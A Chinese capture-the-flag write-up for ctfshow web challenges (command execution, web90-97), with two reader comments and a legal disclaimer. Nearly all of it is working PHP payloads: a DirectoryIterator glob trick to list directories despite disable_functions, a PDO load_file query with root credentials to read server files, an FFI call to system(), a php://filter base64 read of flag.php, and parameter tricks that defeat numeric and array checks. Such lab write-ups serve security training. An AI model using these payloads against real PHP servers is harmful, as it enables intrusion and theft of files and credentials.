>
>
ctfshow web入门 命令执行+web90-97
hdxw
命令执行通关playload
实际上是代码执行,用代码读目录和文件内容
参考:https://www.php.net/manual/zh/book.spl.php
以下是绕过disable_funcitons的全通代码,如果要禁用类可以配置disable_classes
读目录
$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');};读文件
try {
$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');
foreach($dbh->query('select load_file("/var/www/html/index.php")') as $row) {
echo($row[0])."|";
}
$dbh = null;
} catch (PDOException $e) {
echo $e->getMessage();
die();
}web77
ffi,php7.4才有
$ffi = FFI::cdef("int system(const char *command);");
$ffi->system("whoami");web90-95
?num=%204476
?cmd=php%0aphp
?num=0x117c
?num=%20010574
?num=4476.0
?num=%20010574
web96
php://filter/convert.base64-encode/resource=flag.php
web97
a[]=a
b[]=b
Firebasky
师傅 96 也可以使用./flag.php
linxidd
90可以用4476e2
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论